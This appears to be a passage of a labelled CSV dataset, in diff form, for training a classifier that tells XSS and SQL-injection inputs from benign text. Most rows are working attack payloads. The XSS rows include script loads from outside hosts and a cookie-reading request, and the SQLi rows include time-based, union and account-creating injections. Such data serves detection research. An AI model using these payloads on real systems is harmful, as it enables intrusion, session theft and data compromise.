+ "<;HEAD>;<;META HTTP-EQUIV="";CONTENT-TYPE""; CONTENT="";text/html; charset=UTF-7"";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-",1,XSS,470
472
+ "The Financial Select Sector SPDR Fund fell 3 percent year-to-date through Friday compared with the Energy Select Sector SPDR Fund up 8 percent and up 1 percent, respectively.",3,normal,471
473
+ Select a program for video editing.,3,normal,472
474
+ AND 7300=7300 AND 'pKlZ'='pKlZ,2,SQLi,473
475
+ <xss contenteditable onbeforeinput=alert(1)>test,1,XSS,474
476
+ "{""id"":null,""name"":""PrinceMamemon""}",3,normal,475
477
+ 1' where 2673 = 2673,2,SQLi,476
478
+ "<script>alert(""hellox worldss"")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510",1,XSS,477
479
+ "-9871"" ) union all select 9082#",2,SQLi,478
480
+ "-8301' ) union all select 1806,1806--",2,SQLi,479
481
+ "Previously, it was only available to a few select Google partners.",3,normal,480
482
+ -5708 where 3134 = 3134 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,481
483
+ "-1543%' union all select 9341,9341,9341,9341,9341,9341,9341,9341,9341--",2,SQLi,482
484
+ "<legend draggable=""true"" ondragstart=""alert(1)"">test</legend>",1,XSS,483
485
+ "javascript:""/*`/*\""/*' /*</stYle/</titLe/</teXtarEa/</nOscript></Script></noembed></select></template><FRAME/onload=/**/alert()//--><<sVg/onload=alert``>",1,XSS,484
486
+ "<img/id=""alert('XSS')\""/alt=\""/\""src=\""/\""onerror=eval(id)>",1,XSS,485
487
+ "<rtc draggable=""true"" ondragend=""alert(1)"">test</rtc>",1,XSS,486
488
+ select ( case when ( 8113 = 8981 ) then 8113 else 1/ ( select 0 ) end ) --,2,SQLi,487
489
+ "<s onpaste=""alert(1)"" contenteditable>test</s>",1,XSS,488
490
+ "<html onmouseenter=""alert(1)"">test</html>",1,XSS,489
491
+ "1 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,490
492
+ "1 ) ) as hrks where 7637 = 7637 or elt ( 6272 = 6272,sleep ( 5 ) ) --",2,SQLi,491
493
+ 1 ) where 2307 = 2307,2,SQLi,492
494
+ "<SCRIPT a="">'>"" SRC=""httx://xss.rocks/xss.js""></SCRIPT>",1,XSS,493
495
+ "1'+ ( select jxgx where 7446 = 7446 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,494
496
+ AND 1 = utl_inaddr.get_host_address ( ( SELECT COUNT ( DISTINCT ( table_name ) ) FROM sys.all_tables ) ) AND 'i' = 'i,2,SQLi,495
497
+ or '7659' = '7659,2,SQLi,496
498
+ "{""id"":null,""name"":""lift""}",3,normal,497
499
+ "<big onclick=""alert(1)"">test</big>",1,XSS,498
500
+ "select * from users where id = 1 or ""& ) "" or 1 = 1 -- 1",2,SQLi,499
501
+ "<body onbeforeunload=""location='javascript:alert(1)'"">",1,XSS,500
502
+ "<div draggable=""true"" ondragleave=""alert(1)"">test</div>",1,XSS,501
503
+ "1%' ) union all select null,null,null,null,null,null,null#",2,SQLi,502
504
+ "<thead onclick=""alert(1)"">test</thead>",1,XSS,503
505
+ "1 ) as qjjm where 3850 = 3850 or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,504
506
+ "<style>@keyframes x{}</style><dialog style=""animation-name:x"" onanimationend=""alert(1)""></dialog>",1,XSS,505
507
+ "-6951"" union all select 2518,2518,2518,2518,2518,2518,2518,2518--",2,SQLi,506
508
+ -7720 ) ) or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 8254 = 8254,2,SQLi,507
509
+ UNION ALL SELECT,2,SQLi,508
510
+ "<main onbeforecut=""alert(1)"" contenteditable>test</main>",1,XSS,509
511
+ "-2373%"" ) or 9323 = 9323#",2,SQLi,510
512
+ "<style>:target {transform: rotate(180deg);}</style><mark id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></mark>",1,XSS,511
513
+ "1"" ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ""quni"" = ""quni",2,SQLi,512
514
+ "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><address id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></address>",1,XSS,513
515
+ "1 and 6510 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) -- ixlk",2,SQLi,514
516
+ Sort the wires.,3,normal,515
517
+ -4828%' ) or 8678 = 5745#,2,SQLi,516
518
+ "select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual and ( ( '%' = '",2,SQLi,517
519
+ select ( case when ( 9696 = 2874 ) then 1 else 9696* ( select 9696 from master..sysdatabases ) end ) --,2,SQLi,518
520
+ "<style>@keyframes slidein {}</style><noscript style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></noscript>",1,XSS,519
521
+ "<sup onmouseover=""alert(1)"">test</sup>",1,XSS,520
522
+ "select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 and ( ""seci"" = ""seci",2,SQLi,521
523
+ "<;SCRIPT/XSS SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,522
524
+ <input onpointerup=alert(1)>XSS</input>,1,XSS,523
525
+ "-5643' ) ) union all select 1515,1515#",2,SQLi,524
526
+ "1'|| ( select 'wqmz' where 6400 = 6400 and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) ) ||'",2,SQLi,525
527
+ "select * from users where id = 1 +\. union select null,@@VERSION -- 1",2,SQLi,526
528
+ "1' ) where 3375 = 3375 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,527
529
+ I want to select a book for my book club.,3,normal,528
530
+ "<sub onmouseenter=""alert(1)"">test</sub>",1,XSS,529
531
+ """+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20--",2,SQLi,530
532
+ "--></script></title></style>""/</textarea><a' onclick=alert()//>*/alert()/*",1,XSS,531
533
+ <svg><p onload=alert(1)></p>,1,XSS,532
534
+ "-3856"" ) as iyzl where 7394 = 7394 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,533
535
+ "Pickup options: Select ""Check store availability"" as you shop online, then select ""Same day pickup"" at checkout.",3,normal,534
536
+ "-3775' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,535
537
+ <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>,1,XSS,536
538
+ "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--",2,SQLi,537
539
+ "<!--<img src=""--><img src=x onerror=alert(123)//"">",1,XSS,538
540
+ "<button onmouseenter=""alert(1)"">test</button>",1,XSS,539
541
+ 1' ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 'njge' like 'njge,2,SQLi,540
542
+ "<input oncopy=alert(1) value=""XSS"" autofocus>",1,XSS,541
543
+ "select * from users where id = 1 union select 1||1,version ( ) -- 1",2,SQLi,542
544
+ <xmp id=x tabindex=1 onactivate=alert(1)></xmp>,1,XSS,543
545
+ Select your trade.,3,normal,544
546
+ "<style>:target {color:red;}</style><u id=x style=""transition:color 1s"" ontransitionend=alert(1)></u>",1,XSS,545
547
+ Randomly select a honeymoon song.,3,normal,546
548
+ "1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( 'ngxz' = 'ngxz",2,SQLi,547
549
+ I need to decide where to go for a hike.,3,normal,548
550
+ 1'+ ( select xruo where 5709 = 5709 and 7533 = 7533 ) +',2,SQLi,549
551
+ Help your tween or teen select age-appropriate sources and topics.,3,normal,550
552
+ "1"" ) ) as ubrg where 7318 = 7318 and 7331 = 6529--",2,SQLi,551
553
+ Select the relevant year below for a complete list of starred decisions for that year.,3,normal,552
554
+ select * from users where id = '1' or \<1 or 1 = 1 -- 1',2,SQLi,553
555
+ "))) AND ELT(1337=1337,SLEEP(5)) AND (((1337=1337",2,SQLi,554
556
+ <button onMouseUp=javascript:alert(1)>,1,XSS,555
557
+ "<a href=""\xE2\x80\x82javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,556
558
+ Execute(MsgBox(chr(88)&chr(83)&chr(83)))<,1,XSS,557
559
+ "-1598"" ) ) or elt ( 5329 = 9628,9628 ) and ( ( ""hyxq"" like ""hyxq",2,SQLi,558
560
+ select ( case when ( 5569 = 9390 ) then 5569 else 1/ ( select 0 ) end ) --,2,SQLi,559
561
+ "1' ) ) ) or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,560
562
+ "<style>@keyframes x{}</style><element style=""animation-name:x"" onanimationstart=""alert(1)""></element>",1,XSS,561
563
+ "<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send();",1,XSS,562
564
+ ( case when 8422 = 8452 then 1 else null end ),2,SQLi,563
565
+ "select * from users where id = 1 -@<@ union select null,version ( ) -- 1",2,SQLi,564
566
+ "1"" and elt ( 4249 = 4249,7259 )",2,SQLi,565
567
+ "<map onmouseover=""alert(1)"">test</map>",1,XSS,566
568
+ "1%"" ) ) ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) and ( ( ""%"" = """,2,SQLi,567
569
+ "select * from users where id = 1 or ""; ( "" or 1 = 1 -- 1",2,SQLi,568
570
+ "1%"" ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( ""%"" = """,2,SQLi,569
571
+ 1' ) ) and ( 3020 = 3020 ) *6703 and ( ( 'vvkd' like 'vvkd,2,SQLi,570
572
+ 1'+ ( select 'ueak' where 7329 = 7329 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) ) +',2,SQLi,571
573
+ "<main onkeyup=""alert(1)"" contenteditable>test</main>",1,XSS,572
574
+ "1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( 'ywxc' = 'ywxc",2,SQLi,573
575
+ "1 ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( 1624 = 1624",2,SQLi,574
576
+ "1, ( select ( case when ( 8596 = 8596 ) then 1 else 8596* ( select 8596 from mysql.db ) end ) )",2,SQLi,575
577
+ "Open the Preview app on your Mac and select the file you wish to highlight through the ""File"" menu option, where you can select ""Open…"" to locate a file.",3,normal,576
578
+ "<style>@keyframes slidein {}</style><svg style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></svg>",1,XSS,577
579
+ ) or pg_sleep(__TIME__)--,2,SQLi,578
580
+ <SCRIPT SRC=//.rocks/.j>,1,XSS,579
581
+ ";a=prompt,a()//",1,XSS,580
582
+ 1%' ) ) ) or sleep ( 5 ) #,2,SQLi,581
583
+ "1' ) ) ) or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,582
584
+ 1 ) and ( select * from ( select ( sleep ( 5 ) ) ) fzno ) and ( 6824 = 6824,2,SQLi,583
585
+ "<image onkeydown=""alert(1)"" contenteditable>test</image>",1,XSS,584
586
+ 1 ) where 8232 = 8232 and ( 3020 = 3020 ) *6703--,2,SQLi,585
587
+ Select the perfect song.,3,normal,586
588
+ <nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus>,1,XSS,587
589
+ "#""><img src=M onerror=alert('XSS');>",1,XSS,588
590
+ "1%"" ) ) ) rlike ( select ( case when ( 4442 = 4476 ) then 1 else 0x28 end ) ) and ( ( ( ""%"" = """,2,SQLi,589
591
+ "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></embed>",1,XSS,590
592
+ "{""id"":null,""name"":""Lickilicky""}",3,normal,591
593
+ "1"" ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,592
594
+ "-9136%"" ) union all select 3081,3081,3081,3081,3081,3081,3081#",2,SQLi,593
595
+ <bdi id=x tabindex=1 onfocusin=alert(1)></bdi>,1,XSS,594
596
+ "-8888%' ) union all select 5312,5312,5312,5312,5312,5312,5312,5312--",2,SQLi,595
597
+ "-9209%"" ) ) ) union all select 3736,3736,3736--",2,SQLi,596
598
+ select ( case when ( 1946 = 1302 ) then 1946 else 1/ ( select 0 ) end ) --,2,SQLi,597
599
+ Select theaters will start showing the film on April 28.,3,normal,598
600
+ "-4869%' union all select 5729,5729,5729--",2,SQLi,599
601
+ "<menu onmousedown=""alert(1)"">test</menu>",1,XSS,600
602
+ "<blockquote onkeypress=""alert(1)"" contenteditable>test</blockquote>",1,XSS,601
603
+ "<noscript draggable=""true"" ondragend=""alert(1)"">test</noscript>",1,XSS,602
604
+ "<span draggable=""true"" ondragleave=""alert(1)"">test</span>",1,XSS,603
605
+ <form onpointerdown=alert(1)>XSS</form>,1,XSS,604
606
+ <center id=x tabindex=1 onactivate=alert(1)></center>,1,XSS,605
607
+ She'll select the cake.,3,normal,606
608
+ "1' or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) and 'zpyx' = 'zpyx",2,SQLi,607
609
+ 1' ) ) ) and sleep ( 5 ) and ( ( ( 'hwjy' = 'hwjy,2,SQLi,608
610
+ ORDER BY 25#,2,SQLi,609
611
+ <li id=x tabindex=1 onbeforeactivate=alert(1)></li>,1,XSS,610
612
+ `'><script>\x20javascript:alert(536)</script>,1,XSS,611
613
+ <sub onpointerleave=alert(1)>XSS</sub>,1,XSS,612
614
+ "<bgsound onPropertyChange bgsound onPropertyChange=""javascript:javascript:alert(1)""></bgsound onPropertyChange>",1,XSS,613
615
+ select ( case when ( 9434 = 2780 ) then 9434 else 9434* ( select 9434 from information_schema.character_sets ) end ) #,2,SQLi,614
616
+ "1"" ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ""lsca"" like ""lsca",2,SQLi,615
617
+ "ABC<div style=""x:expression\x00(javascript:alert(1)"">DEF",1,XSS,616
618
+ "<del onpaste=""alert(1)"" contenteditable>test</del>",1,XSS,617
619
+ "1%"" ) and 4595 = 4595#",2,SQLi,618
620
+ "{""id"":null,""firstName"":""Cherie"",""lastName"":""Draws"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,619
621
+ ( case when 5640 = 5640 then 5640 else null end ),2,SQLi,620
622
+ Select haggle.,3,normal,621
623
+ "UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#",2,SQLi,622
624
+ 1'+ ( select 'hcqf' where 9956 = 9956 and ( 2993 = 4297 ) *4297 ) +',2,SQLi,623
625
+ ORDER BY 15--,2,SQLi,624
626
+ "-6970"" ) ) or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ""dyrq"" like ""dyrq",2,SQLi,625
627
+ <a onpointerleave=alert(1)>XSS</a>,1,XSS,626
628
+ "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( table_name ) FROM ( SELECT DISTINCT ( table_name ) , ROWNUM AS LIMIT FROM sys.all_tables ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",2,SQLi,627
629
+ "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30",2,SQLi,628
630
+ 1%' ) and 2949 = 4847 and ( '%' = ',2,SQLi,629
631
+ "-8026 or elt ( 8434 = 4516,4516 ) # bsqo",2,SQLi,630
632
+ Sort results where required.,3,normal,631
633
+ "<style>:target {color:red;}</style><tr id=x style=""transition:color 1s"" ontransitionend=alert(1)></tr>",1,XSS,632
634
+ "{""id"":null,""firstName"":""Sakinah"",""lastName"":""Ali"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,633
635
+ "<data oncopy=""alert(1)"" contenteditable>test</data>",1,XSS,634
636
+ <source onpointerup=alert(1)>XSS</source>,1,XSS,635
637
+ "Over nearly nine years, the research team tracked this select group.",3,normal,636
638
+ "<thead onmouseover=""alert(1)"">test</thead>",1,XSS,637
639
+ "-5132%"" ) ) or 3038 = 3038",2,SQLi,638
640
+ "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>",1,XSS,639
641
+ "<form onkeypress=""alert(1)"" contenteditable>test</form>",1,XSS,640
642
+ "<SVg </onlOad =""1> (_=prompt,_(1)) """">",1,XSS,641
643
+ "{""id"":null,""firstName"":""Florence"",""lastName"":""Tan"",""address"":""732 W 2ND ST, TIFTON GA 31794"",""city"":""199"",""telephone"":""4611423502""}",3,normal,642
644
+ 1 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) # cykf,2,SQLi,643
645
+ &#0000060,1,XSS,644
646
+ [a](javascript://www.google.com%0Aprompt(1)),1,XSS,645
647
+ "insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --",2,SQLi,646
648
+ "1 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) -- bqxe",2,SQLi,647
649
+ "<style>:target {color:red;}</style><section id=x style=""transition:color 1s"" ontransitionend=alert(1)></section>",1,XSS,648
650
+ "select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( 'inec' = 'inec",2,SQLi,649
651
+ "-1510' ) ) ) union all select 8755,8755,8755,8755,8755,8755,8755,8755,8755,8755--",2,SQLi,650
652
+ "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))--",2,SQLi,651
653
+ "{""id"":null,""name"":""VenusaurMega Venusaur""}",3,normal,652
654
+ But they are roaming a few select sections of American road.,3,normal,653
655
+ <thead id=x tabindex=1 onbeforeactivate=alert(1)></thead>,1,XSS,654
656
+ "<abbr onmouseup=""alert(1)"">test</abbr>",1,XSS,655
657
+ "<button onkeydown=""alert(1)"" contenteditable>test</button>",1,XSS,656
658
+ "1' ) where 2802 = 2802 union all select null,null,null#",2,SQLi,657
659
+ "<style>@keyframes x{}</style><button style=""animation-name:x"" onanimationend=""alert(1)""></button>",1,XSS,658
660
+ Where did you find that unique sculpture?,3,normal,659
661
+ "-6440 ) ) ) union all select 3316,3316,3316,3316,3316,3316,3316,3316,3316,3316--",2,SQLi,660
662
+ <nav id=x tabindex=1 onactivate=alert(1)></nav>,1,XSS,661
663
+ "<bgsound onmouseup=""alert(1)"">test</bgsound>",1,XSS,662
664
+ "<summary onmouseenter=""alert(1)"">test</summary>",1,XSS,663
665
+ "1 ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,664
666
+ "1"" ) ) ) or elt ( 6272 = 6272,sleep ( 5 ) ) and ( ( ( ""hxgu"" = ""hxgu",2,SQLi,665
667
+ "1 where 5401 = 5401 and elt ( 1210 = 1210,sleep ( 5 ) ) --",2,SQLi,666
668
+ 1'+ ( select xzse where 4530 = 4530,2,SQLi,667
669
+ "<style>@keyframes x{}</style><wbr style=""animation-name:x"" onanimationstart=""alert(1)""></wbr>",1,XSS,668
670
+ "&lt;SCRIPT/SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,669
671
+ """I don't think they will select me again,"" he said, laughing.",3,normal,670
672
+ "1"" ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( ""rrbl"" = ""rrbl",2,SQLi,671
673
+ "<;SCRIPT "";a=';>;';""; SRC="";http://ha.ckers.org/xss.js"";>;<;/SCRIPT>;",1,XSS,672
674
+ <script>javascript:alert(1)</script\x0D,1,XSS,673
675
+ "<audio autoplay controls onseeking=alert(1)><source src=""validaudio.wav"" type=""audio/wav""></audio>",1,XSS,674
676
+ <video id=x tabindex=1 ondeactivate=alert(1)></video><input id=y autofocus>,1,XSS,675
677
+ "-1687 ) ) as lnva where 8396 = 8396 union all select 8396,8396#",2,SQLi,676
678
+ It'll also only be live at select locations for each.,3,normal,677
679
+ Join tables where needed.,3,normal,678
680
+ "<style>:target {transform: rotate(180deg);}</style><textarea id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></textarea>",1,XSS,679
681
+ "1"" ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ""xmrq"" = ""xmrq",2,SQLi,680
682
+ "1 ) where 8691 = 8691 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,681
683
+ "-4721' ) or elt ( 4378 = 5165,5165 ) and ( 'fufn' = 'fufn",2,SQLi,682
684
+ "<SCRIPT ="">"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,683
685
+ "1' ) as ildf where 5545 = 5545 union all select null,null,null,null#",2,SQLi,684
686
+ "<iframe draggable=""true"" ondragleave=""alert(1)"">test</iframe>",1,XSS,685
687
+ "1 ) ) as jfae where 6684 = 6684 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,686
688
+ Save up to 30% off select Simple Modern water bottles,3,normal,687
689
+ "<em draggable=""true"" ondragend=""alert(1)"">test</em>",1,XSS,688
690
+ "1'+ ( select tvpj where 7058 = 7058 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) +'",2,SQLi,689
691
+ `'><script>\xE2\x80\x8Bjavascript:alert(528)</script>,1,XSS,690
692
+ 1'+ ( select 'wvqj' where 3709 = 3709,2,SQLi,691
693
+ 1 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) # lexm,2,SQLi,692
694
+ 1' in boolean mode ) waitfor delay '0:0:5'--,2,SQLi,693
695
+ "1' in boolean mode ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) #",2,SQLi,694
696
+ "<noembed onkeydown=""alert(1)"" contenteditable>test</noembed>",1,XSS,695
697
+ "1%"" ) waitfor delay '0:0:5'--",2,SQLi,696
698
+ "<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?",1,XSS,697
699
+ "{""id"":null,""firstName"":""Kenneth Wai Keen"",""lastName"":""Tang"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,698
700
+ "<img src onerror /"" '""= alt=javascript:alert(1)//"">",1,XSS,699
701
+ Where's the hostel?,3,normal,700
702
+ <ul onpointerup=alert(1)>XSS</ul>,1,XSS,701
703
+ "<script onbeforecut=""alert(1)"" contenteditable>test</script>",1,XSS,702
704
+ "1%' ) union all select null,null,null,null#",2,SQLi,703
705
+ "<dir draggable=""true"" ondragend=""alert(1)"">test</dir>",1,XSS,704
706
+ "<style>@keyframes slidein {}</style><col style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></col>",1,XSS,705
707
+ "select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) ||'",2,SQLi,706
708
+ "{""id"":null,""firstName"":""Nurul"",""lastName"":""Asyikin"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,707
709
+ "( select 2768 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 2768 = 2768,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,708
710
+ "<kbd onkeyup=""alert(1)"" contenteditable>test</kbd>",1,XSS,709
711
+ Select your pick.,3,normal,710
712
+ 1' ) as nftr where 8825 = 8825 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,711
713
+ """ ) or ( ""x"" ) = ( ""x",2,SQLi,712
714
+ <font onpointerleave=alert(1)>XSS</font>,1,XSS,713
715
+ "1%' ) union all select null,null,null#",2,SQLi,714
716
+ I'm planning to pick up some gardening tools.,3,normal,715
717
+ Filter rows where required.,3,normal,716
718
+ -2165' where 6593 = 6593 or 9158 = 7254--,2,SQLi,717
719
+ -8828%' ) ) ) or 4144 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4144 = 4144 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and ( ( ( '%' = ',2,SQLi,718
720
+ "<img SRC=""jav ascript:document.vulnerable=true;"">",1,XSS,719
721
+ "<marquee onbeforecut=""alert(1)"" contenteditable>test</marquee>",1,XSS,720
722
+ -1219' ) or 5592 = 4835,2,SQLi,721
723
+ Where's the lake?,3,normal,722
724
